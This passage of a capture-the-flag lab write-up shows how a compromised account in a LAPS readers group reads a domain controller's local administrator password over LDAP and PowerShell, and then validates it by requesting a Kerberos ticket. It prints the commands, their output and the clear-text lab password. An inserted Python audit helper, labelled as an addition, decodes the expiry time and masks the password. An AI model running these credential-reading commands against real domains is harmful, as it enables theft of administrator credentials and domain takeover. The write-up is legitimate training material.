ReadLAPSPassword


As [[timelapse_bloodhound#ReadLAPSPassword|discovered]] during the BloodHound session, the current user's membership in the LAPS_Readers group grants the [ReadLAPSPassword](https://bloodhound.readthedocs.io/en/latest/data-analysis/edges.html#readlapspassword) privilege. The presence of LAPS has been hinted at on numerous occasions throughout the engagement up to this point.

I will first confirm the installation of LAPS.

Confirmation


The LAPS installation appears to have been made to the usual C:\Program Files directory.

*Evil-WinRM* PS C:\> Get-ADObject 'CN=ms-mcs-admpwd,CN=Schema,CN=Configuration,DC=TIMELAPSE,DC=HTB'
 
DistinguishedName                                               Name          ObjectClass     ObjectGUID
-----------------                                               ----          -----------     ----------
CN=ms-mcs-admpwd,CN=Schema,CN=Configuration,DC=TIMELAPSE,DC=HTB ms-Mcs-AdmPwd attributeSchema 3f9cf79b-dc5d-42b2-a89b-4eec1c917ed1

Installation can also be checked with the Get-ADObject PowerShell cmdlet by querying for the schema object that LAPS adds. Its presence indicates that LAPS is installed as a schema extension in the target domain.

Abuse


Now that the installation has been verified, I can move on to abusing the privilege. While there are multiple ways to abuse the privilege granted to the compromised user account to read LAPS passwords, it is important to note that the password is stored as an LDAP attribute on the computer object, defined by an extension to the Active Directory schema. This schema extension allows for the centralized storage of local administrator passwords for domain computers.

Consequently, these passwords can be queried remotely over LDAP without establishing a PowerShell session, which makes them a security risk whenever unauthorized read access to the attribute is obtained.

It can therefore be checked with an LDAP query.

┌──(kali㉿kali)-[~/archive/htb/labs/timelapse]
└─$ KRB5CCNAME=svc_deploy@dc01.timelapse.htb.ccache powerview 'timelapse.htb/@dc01.timelapse.htb' -k --no-pass --use-ldaps --dc-ip $IP -q 'Get-DomainObject "CN=DC01,OU=DOMAIN CONTROLLERS,DC=TIMELAPSE,DC=HTB" -ResolveGUIDs' | grep -i ms-Mcs-AdmPwd
[2023-10-25 09:57:44] LDAP Signing NOT Enforced!
ms-mcs-admpwd                     : 6%HZ8hr1w5/Jj}o}r(7em/55
ms-mcs-admpwdexpirationtime       : 133430914802257711

While any LDAP tool can be used for the query, I find the Python implementation of PowerView powerful, as it accepts the TGT. ms-Mcs-AdmPwd is the LDAP attribute that stores the LAPS password. The LAPS password is 6%HZ8hr1w5/Jj}o}r(7em/55.
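As an added example that is not part of the original writeup, the following Python helper parses the two LAPS attribute lines returned by the PowerView query above and decodes ms-mcs-admpwdexpirationtime (a Windows FILETIME) so an auditor can tell whether a stored password is past its expiry. The reference time is taken from the `[2023-10-25 09:57:44]` log line and is assumed to be UTC; the attribute lines are a constructed sample mirroring the output above.

```python
from datetime import datetime, timedelta, timezone

# Windows FILETIME: 100-nanosecond ticks since 1601-01-01 00:00:00 UTC
_FILETIME_EPOCH = datetime(1601, 1, 1, tzinfo=timezone.utc)


def filetime_to_datetime(filetime: int) -> datetime:
    """Convert an AD FILETIME integer (as in ms-Mcs-AdmPwdExpirationTime) to a UTC datetime."""
    return _FILETIME_EPOCH + timedelta(microseconds=filetime // 10)


def parse_laps_attributes(ldap_output: str) -> dict:
    """Pull the two LAPS attributes out of 'name : value' lines like PowerView prints."""
    attrs = {}
    for line in ldap_output.splitlines():
        if ":" not in line:
            continue
        name, _, value = line.partition(":")
        name = name.strip().lower()
        if name in ("ms-mcs-admpwd", "ms-mcs-admpwdexpirationtime"):
            attrs[name] = value.strip()
    return attrs


def audit_laps_entry(ldap_output: str, now: datetime) -> dict:
    """Report expiry status and password length without echoing the clear-text value."""
    attrs = parse_laps_attributes(ldap_output)
    expires = filetime_to_datetime(int(attrs["ms-mcs-admpwdexpirationtime"]))
    pwd = attrs.get("ms-mcs-admpwd", "")
    return {
        "expires_utc": expires,
        "expired": expires <= now,
        "days_remaining": (expires - now).days,
        "password_length": len(pwd),
        # mask all but the first two characters so the audit log does not leak the secret
        "password_masked": (pwd[:2] + "*" * (len(pwd) - 2)) if pwd else "",
    }


# Constructed sample mirroring the attribute lines returned by the query above
SAMPLE_OUTPUT = """\
ms-mcs-admpwd                     : 6%HZ8hr1w5/Jj}o}r(7em/55
ms-mcs-admpwdexpirationtime       : 133430914802257711
"""
# Assumed reference time: the PowerView log timestamp, treated as UTC
QUERY_TIME = datetime(2023, 10, 25, 9, 57, 44, tzinfo=timezone.utc)

if __name__ == "__main__":
    print(audit_laps_entry(SAMPLE_OUTPUT, QUERY_TIME))
```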

*Evil-WinRM* PS C:\Users\svc_deploy\Documents> Get-ADComputer -Identity DC01 -Properties "ms-MCS-AdmPwd" | Select ms-MCS-AdmPwd
 
ms-MCS-AdmPwd
-------------
6%HZ8hr1w5/Jj}o}r(7em/55

Alternatively, it can be done with the default ActiveDirectory PowerShell module from an existing PowerShell session, which returns the same password: 6%HZ8hr1w5/Jj}o}r(7em/55

This is essentially the password of the local Administrator account, but it must be validated.

Validation


┌──(kali㉿kali)-[~/archive/htb/labs/timelapse]
└─$ impacket-getTGT timelapse.htb/administrator@dc01.timelapse.htb -dc-ip $IP 
Impacket v0.11.0 - Copyright 2023 Fortra
 
Password: 6%HZ8hr1w5/Jj}o}r(7em/55
[*] Saving ticket in administrator@dc01.timelapse.htb.ccache

Validation complete. A TGT was generated for the administrator user. Moving on to the privilege escalation phase for the complete domain compromise.